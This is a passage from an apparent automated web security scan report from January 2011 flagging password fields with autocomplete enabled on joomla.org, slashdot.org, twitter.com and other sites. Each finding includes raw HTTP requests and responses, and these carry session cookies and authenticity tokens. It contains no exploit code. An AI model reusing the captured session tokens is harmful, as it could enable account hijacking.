<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</p>
<form action="/gf/account/?action=UserAddAction" method="POST">
   <table border="0">
...[SNIP]...
<br />
           <input type="password" name="password" maxlength="32" value="" /></td>
...[SNIP]...
<br />
           <input type="password" name="password_confirm" maxlength="32" value="" /></td>
...[SNIP]...

15.64. http://my.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://my.joomla.org/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/
Last-Modified: Mon, 24 Jan 2011 22:43:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

15.65. http://netvouz.com/action/submitBookmark

Summary

Severity:   Low
Confidence:   Certain
Host:   http://netvouz.com
Path:   /action/submitBookmark

Issue detail

The page contains a form with the following action URL:
  • http://netvouz.com/action/submitBookmark
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:42 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5096


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</p>

           
                       <form name="submitBookmarkForm" method="post" action="/action/submitBookmark">
               <table>
...[SNIP]...
<td><input type="password" name="password" maxlength="15" size="18" tabindex="2" value="" /></td>
...[SNIP]...

15.66. http://newsguy.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsguy.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://newsguy.com/javascript:LoginNow()
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:34 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07e5e76216ca9266b6006a1955c20780; path=/
Content-Length: 35166
Cache-Control: private
Content-Type: text/html

<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>

<title>Welcome to Newsguy!</title>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" width="283" height="37" style="font-family: Arial; font-size: 80%;">
<form name=loginform method=POST action="javascript:LoginNow()">
<tr>
...[SNIP]...
<td width="77" height="22" align="left">
<input type="password" name="pass" size="8"></td>
...[SNIP]...

15.67. http://people.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://people.joomla.org/people.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>

   <form action="/people.html" method="post" name="login" id="form-login" >
<label>
...[SNIP]...
<br />
<input type="password" class="inputbox frontlogin" name="passwd" id="password" />
</label>
...[SNIP]...

15.68. http://people.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://people.joomla.org/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/index.php"
   method="post" name="cd_login_form_login" id="cd_login_form_login">

<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" />
</p>
...[SNIP]...

15.69. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page contains a form with the following action URL:
  • http://people.joomla.org/groups.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/groups.html"
   method="post" name="cd_login_form_login" id="cd_login_form_login">

<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" />
</p>
...[SNIP]...

15.70. http://resources.joomla.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://resources.joomla.org/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.71. http://resources.joomla.org/directory/advsearch.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/advsearch.html

Issue detail

The page contains a form with the following action URL:
  • http://resources.joomla.org/directory.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.72. http://resources.joomla.org/directory/new.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/new.html

Issue detail

The page contains a form with the following action URL:
  • http://resources.joomla.org/directory.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.73. http://resources.joomla.org/how-to-add-listings.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /how-to-add-listings.html

Issue detail

The page contains a form with the following action URL:
  • http://resources.joomla.org/how-to-add-listings.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/how-to-add-listings.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.74. http://slashdot.org/bookmark.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page contains a form with the following action URL:
  • http://slashdot.org/login.pl
The form contains the following password field with autocomplete enabled:
  • upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
<div id="loginform">
                   <form action="//slashdot.org/login.pl" method="post">
<fieldset>
...[SNIP]...
<input type="hidden" name="op" value="userlogin">
   <input type="password" name="upasswd" size="20">
   <label class="checkbox">
...[SNIP]...

15.75. http://slashdot.org/bookmark.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page contains a form with the following action URL:
  • http://slashdot.org/login.pl
The form contains the following password field with autocomplete enabled:
  • upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
<div id="login_box_content">
<form action="//slashdot.org/login.pl" method="post">
<fieldset>
...[SNIP]...
<input type="hidden" name="op" value="userlogin">
   <input type="password" name="upasswd" size="20">
   <label class="checkbox">
...[SNIP]...

15.76. http://spongecell.com/event_list

Summary

Severity:   Low
Confidence:   Certain
Host:   http://spongecell.com
Path:   /event_list

Issue detail

The page contains a form with the following action URL:
  • http://spongecell.com/promote/website/login
The form contains the following password field with autocomplete enabled:
  • login[password]

Request

GET /event_list HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:18:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _spongecell_loves_u=BAh7BzoLbG9jYWxlIgplbi1VUyIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxl%250Acjo6Rmxhc2g6OkZsYXNoSGFzaHsGOglub3RlMAY6CkB1c2VkewY7B1Q%253D--e6fed647287bcbc29d3b6b3a07b450dde7852c96; domain=.spongecell.com; path=/
Status: 200 OK
Cache-Control: no-cache
Content-Length: 10097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
<div class="column span-10 first last jsLoggedInHide" id="signIn">
<form action="/promote/website/login" id="signInForm" method="post">
<button class="" id="signInButton" style="" type="submit">
...[SNIP]...
<input class="formHelpText textField" formHelpText="email address" id="emailAddressTextField" name="login[name]" size="30" type="text" />
<input class="xformHelpText textField passwordField" formHelpText="password" id="passwordTextField" name="login[password]" size="30" type="password" />
<!-- - if flash[:note] -->
...[SNIP]...

15.77. http://themehybrid.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://themehybrid.com/blog/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET / HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.2.10.1295921862;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:20:45 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10979

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

15.78. http://themehybrid.com/themes/shadow

Summary

Severity:   Low
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /themes/shadow

Issue detail

The page contains a form with the following action URL:
  • http://themehybrid.com/blog/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET /themes/shadow HTTP/1.1
Host: themehybrid.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:05:39 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=e59ccbea599b13d912fb7478431f66b7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11457

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<div class="column column-2 column-log-in">
               <form class="log-in" action="http://themehybrid.com/blog/wp-login.php" method="post">
                   <p class="text-input">
...[SNIP]...
</label>
                       <input class="field" type="password" name="pwd" id="pwd" size="23" />
                   </p>
...[SNIP]...

15.79. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:09:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910587-82359-30173
ETag: "9a6712df9e465f208b30f02c1f450eaf"
Last-Modified: Mon, 24 Jan 2011 23:09:47 GMT
X-Runtime: 0.01017
Content-Type: text/html; charset=utf-8
Content-Length: 43988
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910586462673; path=/; expires=Mon, 31-Jan-11 23:09:46 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591058790861047; path=/; expires=Wed, 23 Feb 2011 23:09:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQ2OTE2NzQ1OWNkMjZmNGJkODYxYjkwNzEzYWI0N2U0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIBk5Kui0B--357ce574d35e8822769e63fd9d1dd29f4461904b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e233feadc6796ecc55df801c55b46d29aa1cba34" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.80. http://twitter.com/7News/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910395-49850-63408
ETag: "85cdef8719ba6d07512d0d99ffbc30f1"
Last-Modified: Mon, 24 Jan 2011 23:06:35 GMT
X-Runtime: 0.00972
Content-Type: text/html; charset=utf-8
Content-Length: 54324
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6d30d410f5135f569b99421505c0320474a373ef" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.81. http://twitter.com/7News/newsteam

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /7News/newsteam

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-62168-50610
ETag: "da817aed8ad2f932b9830e8a84480989"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.57960
Content-Type: text/html; charset=utf-8
Content-Length: 57201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
